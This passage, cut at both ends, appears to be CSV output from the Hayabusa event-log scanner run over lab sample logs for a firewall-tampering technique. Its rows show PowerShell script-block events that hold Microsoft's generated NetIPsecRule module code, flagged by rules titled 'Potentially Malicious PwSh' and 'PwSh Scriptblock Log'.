} } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetIPsecRule' -Alias '*' function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] 
[uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 
'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Binding",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"s = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Find-NetIPsecRule' -Alias '*' function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] 
${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSet",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"s = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Find-NetIPsecRule' -Alias '*' function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSet",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
